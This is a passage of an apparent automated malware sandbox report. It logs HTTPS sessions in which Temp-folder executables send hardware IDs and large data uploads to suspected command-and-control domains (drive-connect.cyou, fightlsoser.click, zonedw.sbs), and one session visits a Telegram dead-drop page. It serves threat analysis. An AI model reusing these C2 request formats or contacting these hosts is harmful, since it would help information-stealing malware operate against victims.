                                                                                                                                                                                                                                                2024-12-13 12:54:16 UTC15331OUTData Raw: 6d 7f 7e 20 7e ce a8 6d 8b 7e f7 6f 48 5b 70 c4 50 29 8e b7 3a 79 4d 02 ff cb 34 af 78 94 22 ec 73 8b 15 17 42 41 46 26 c0 10 6b bb 15 44 e8 d6 06 79 39 78 7f e4 a8 d2 fc cf a0 91 74 b2 04 d6 67 24 de 7b e9 3c 5b 2e 1b 8b c7 2a 18 87 1f 36 b1 2f cb ae b3 ac b3 aa b6 ee 51 cd d4 85 46 7f 48 ec d9 58 a2 fa 17 cd 17 0e f8 e1 d8 6f e4 da ac c5 02 87 e7 db 7f 70 9f 7a d6 e3 2a 7e df f1 34 68 32 1b a8 0f 5b db 35 a4 68 fa e7 8c 30 38 2c b5 29 44 e3 e3 81 d1 21 aa 78 91 98 18 91 54 45 ac 7c 95 c0 da 65 46 00 24 8e 1f c5 ac 78 ad 0a fc 6e f1 a2 9d 96 93 01 3e 57 43 60 f3 00 65 eb 6a df b2 ed 82 a1 e0 5f 21 0b 31 70 8c dd 5b 5b d9 65 1d df 46 cc f1 41 44 92 79 db 40 43 d0 17 96 d1 74 d5 8d 2d b7 92 f1 ba 2b ed ba 91 3d 25 a9 7c c8 75 1d 09 55 56 e6 94 3d 38 59 dc
                                                                                                                                                                                                                                                Data Ascii: m~ ~m~oH[pP):yM4x"sBAF&kDy9xtg${<[.*6/QFHXopz*~4h2[5h08,)D!xTE|eF$xn>WC`ej_!1p[[eFADy@Ct-+=%|uUV=8Y
                                                                                                                                                                                                                                                2024-12-13 12:54:16 UTC15331OUTData Raw: ee b4 a7 10 10 36 48 08 0b 5a 77 47 14 bb a0 11 72 99 c1 d4 fe 09 f2 76 a7 c8 a6 a1 f1 1e 55 c6 c8 3a 9c 48 2c 02 10 a0 7c 7a 79 fb 04 f6 61 54 b6 84 7c d3 73 f7 e8 3a 11 7e 02 7f 41 c3 e1 79 16 0a d2 06 cf 67 15 5a 7f 32 84 25 e0 e7 24 36 d6 ff ba 91 f6 6b 09 46 7d 9c b3 7f 8e cb 80 14 50 a5 0b e4 db 74 bb ac fa 9a 59 a6 63 78 14 86 c5 0c 09 17 20 96 0d 8a d0 4e 69 3b 14 56 e7 db 0d 84 f7 31 9a b7 91 15 d7 c7 8d 54 dd fe 9d ee 8d df bb e3 ae fa 39 08 c6 05 1c 2f e9 5e 23 8e b4 80 24 77 fd 45 0a fd d7 c9 e0 dc 7b ae 70 13 b8 59 22 c8 d7 23 8c ab 75 ae 47 09 ad 63 96 b5 b1 7f 3e 19 c1 ba 74 d2 9e 4a f5 16 20 91 ed c9 a0 e8 ad 86 46 be 2b 95 ff a6 8e a4 23 80 1f 3f d6 70 e5 54 51 27 6a 55 cc e9 f6 dc 1c 6d 8b 3a c0 13 02 c1 8f b2 72 56 db 2d c5 c7 1d cb 86
                                                                                                                                                                                                                                                Data Ascii: 6HZwGrvU:H,|zyaT|s:~AygZ2%$6kF}PtYcx Ni;V1T9/^#$wE{pY"#uGc>tJ F+#?pTQ'jUm:rV-
                                                                                                                                                                                                                                                2024-12-13 12:54:20 UTC1033INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:20 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=dim6kunl5cqir8cn0babmgludl; expires=Tue, 08-Apr-2025 06:40:58 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N40i8jbM%2BoIQhn%2FF5xpLwEYBrW8RD5A5fUUsbRCYyufUsK2lMhcMIu8UXytqJhLC86kvZZivKM7H2ouONl7%2BZ%2BBVc%2BlR8%2F7ZklYNBj%2FeAFu5iWZMVnYwZRbS6RNAicJZRob6Nw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f161a109f795e86-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1754&min_rtt=1747&rtt_var=669&sent=320&recv=578&lost=0&retrans=0&sent_bytes=2843&recv_bytes=556768&delivery_rate=1619523&cwnd=240&unsent_bytes=0&cid=67caf058aef4c957&ts=4273&x=0"


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                47192.168.2.450382172.67.139.784435900C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:20 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=TXE3429TBFLGY
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 20406
                                                                                                                                                                                                                                                Host: drive-connect.cyou
                                                                                                                                                                                                                                                2024-12-13 12:54:20 UTC15331OUTData Raw: 2d 2d 54 58 45 33 34 32 39 54 42 46 4c 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 54 58 45 33 34 32 39 54 42 46 4c 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 54 58 45 33 34 32 39 54 42 46 4c 47 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 54 58 45 33 34 32 39 54 42 46 4c 47
                                                                                                                                                                                                                                                Data Ascii: --TXE3429TBFLGYContent-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--TXE3429TBFLGYContent-Disposition: form-data; name="pid"3--TXE3429TBFLGYContent-Disposition: form-data; name="lid"FATE99--test--TXE3429TBFLG
                                                                                                                                                                                                                                                2024-12-13 12:54:20 UTC5075OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                                                                                                                                2024-12-13 12:54:22 UTC1020INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:22 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=49fqnd4nan5nquvil0mt29silp; expires=Tue, 08-Apr-2025 06:41:00 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lALgnYrR7lx5hZVK9j27JIGG6Cb0dNf6SftRmoaFXRPbWJPiKsyat5GZOjVKX%2F9bx0xsPKh3y6ROjjmeVNJmF7ht9bHs0CzkEFX8bLob%2FKphC2PLu%2Bi068MahQSRyHhjrskMhV0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f161a2dc8834234-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1924&min_rtt=1902&rtt_var=758&sent=15&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21365&delivery_rate=1401151&cwnd=171&unsent_bytes=0&cid=f7e15b8df05f1686&ts=1376&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:54:22 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:54:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                48192.168.2.450384104.21.35.434437924C:\Users\user\AppData\Local\Temp\1014791001\6f9ea40b81.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:23 UTC265OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 85
                                                                                                                                                                                                                                                Host: fightlsoser.click
                                                                                                                                                                                                                                                2024-12-13 12:54:23 UTC85OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 63 4d 42 73 54 77 2d 2d 49 6e 73 74 61 6c 6c 73 26 6a 3d 26 68 77 69 64 3d 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43
                                                                                                                                                                                                                                                Data Ascii: act=get_message&ver=4.0&lid=cMBsTw--Installs&j=&hwid=6AB8C0C3488F994123D904AF30EFEBBC
                                                                                                                                                                                                                                                2024-12-13 12:54:23 UTC1015INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:23 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=s5janl2q8ij5ajheqg2a1loobn; expires=Tue, 08-Apr-2025 06:41:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dGyiUY12Znuo9CKXUznxJ6GPh%2BjEKg3ufUmu7Z9w1cKcdh5kcXJAwEMl7jMTmlZbEhTYWmKQW3wvYRc2bjVqohXjp4yyna56%2BI7Bj6mFXtFl0IYv9daMZth509DNMOgEB1VNww%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f161a3c4ad5335a-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1973&min_rtt=1973&rtt_var=986&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4224&recv_bytes=986&delivery_rate=126802&cwnd=232&unsent_bytes=0&cid=eb66564f12784fe1&ts=1131&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:54:23 UTC54INData Raw: 33 30 0d 0a 50 50 4d 69 38 73 7a 36 69 31 48 5a 41 58 4b 34 78 66 35 5a 49 52 77 6b 63 65 6d 64 74 43 49 49 36 32 54 59 2f 62 61 58 48 54 78 6e 72 67 3d 3d 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 30PPMi8sz6i1HZAXK4xf5ZIRwkcemdtCII62TY/baXHTxnrg==
                                                                                                                                                                                                                                                2024-12-13 12:54:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                49192.168.2.450390149.154.167.99443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:32 UTC144OUTGET /detct0r HTTP/1.1
                                                                                                                                                                                                                                                Host: t.me
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Cookie: stel_ssid=4325bdd3d696776e18_8917033688022161950
                                                                                                                                                                                                                                                2024-12-13 12:54:33 UTC369INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:33 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                Content-Length: 12314
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                Cache-control: no-store
                                                                                                                                                                                                                                                X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                                Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=35768000
                                                                                                                                                                                                                                                2024-12-13 12:54:33 UTC12314INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 64 65 74 63 74 30 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 72 65 6e
                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @detct0r</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.paren


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                50192.168.2.450392116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:35 UTC230OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:54:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:35 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:54:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                51192.168.2.450395116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:37 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----3W4WB1DBIMOZMYMGVKXL
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 256
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:54:37 UTC256OUTData Raw: 2d 2d 2d 2d 2d 2d 33 57 34 57 42 31 44 42 49 4d 4f 5a 4d 59 4d 47 56 4b 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 42 37 38 34 45 46 46 34 43 41 34 32 39 33 36 30 35 30 34 37 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 0d 0a 2d 2d 2d 2d 2d 2d 33 57 34 57 42 31 44 42 49 4d 4f 5a 4d 59 4d 47 56 4b 58 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 33 57 34 57 42 31 44 42 49 4d 4f 5a 4d 59 4d 47 56 4b 58 4c 2d 2d 0d
                                                                                                                                                                                                                                                Data Ascii: ------3W4WB1DBIMOZMYMGVKXLContent-Disposition: form-data; name="hwid"DB784EFF4CA42936050476-a33c7340-61ca------3W4WB1DBIMOZMYMGVKXLContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------3W4WB1DBIMOZMYMGVKXL--
                                                                                                                                                                                                                                                2024-12-13 12:54:38 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:38 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                2024-12-13 12:54:38 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 31 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 3a1|1|1|1|c74e31f1d3f1f3343bbf45ceebca9756|1|1|1|0|0|50000|10


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                52192.168.2.450396172.67.139.784435900C:\Users\user\AppData\Local\Temp\1014797001\e614d88998.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:38 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=A8M0S4Y1B
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                Content-Length: 3567
                                                                                                                                                                                                                                                Host: drive-connect.cyou
                                                                                                                                                                                                                                                2024-12-13 12:54:38 UTC3567OUTData Raw: 2d 2d 41 38 4d 30 53 34 59 31 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 41 42 38 43 30 43 33 34 38 38 46 39 39 34 31 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 41 38 4d 30 53 34 59 31 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 41 38 4d 30 53 34 59 31 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 41 38 4d 30 53 34 59 31 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                                                                                                                                                                                Data Ascii: --A8M0S4Y1BContent-Disposition: form-data; name="hwid"6AB8C0C3488F994123D904AF30EFEBBC--A8M0S4Y1BContent-Disposition: form-data; name="pid"1--A8M0S4Y1BContent-Disposition: form-data; name="lid"FATE99--test--A8M0S4Y1BContent-Dispo
                                                                                                                                                                                                                                                2024-12-13 12:54:39 UTC1017INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:39 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=hrjeqos60qq613fatj1ccp3bmq; expires=Tue, 08-Apr-2025 06:41:18 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JF6335T9twmASafD8eAngg0tPULaE%2BT4toXGI6ORY%2BpK7v2jdTuN%2FEmTQoJPAkaS4uN8r5CCcTVYGd3IQ4bBWPuoeZl88ISFxRpcvL6eJeZzsV1ocnTiKjqACDURyzH7OcKlwEM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                CF-RAY: 8f161a9c3bb343b5-EWR
                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2177&min_rtt=2166&rtt_var=834&sent=6&recv=10&lost=0&retrans=0&sent_bytes=2845&recv_bytes=4477&delivery_rate=1294326&cwnd=225&unsent_bytes=0&cid=b358fff639a462fe&ts=741&x=0"
                                                                                                                                                                                                                                                2024-12-13 12:54:39 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                2024-12-13 12:54:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                53192.168.2.450398116.203.10.31443
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                2024-12-13 12:54:39 UTC322OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----79RQ1NOHDJMYMYU3ECBA
                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                Host: zonedw.sbs
                                                                                                                                                                                                                                                Content-Length: 331
                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                2024-12-13 12:54:39 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 37 34 65 33 31 66 31 64 33 66 31 66 33 33 34 33 62 62 66 34 35 63 65 65 62 63 61 39 37 35 36 0d 0a 2d 2d 2d 2d 2d 2d 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 37 39 52 51 31 4e 4f 48 44 4a 4d 59 4d 59 55 33 45 43 42 41 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                Data Ascii: ------79RQ1NOHDJMYMYU3ECBAContent-Disposition: form-data; name="token"c74e31f1d3f1f3343bbf45ceebca9756------79RQ1NOHDJMYMYU3ECBAContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------79RQ1NOHDJMYMYU3ECBACont
                                                                                                                                                                                                                                                2024-12-13 12:54:40 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:54:40 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: close
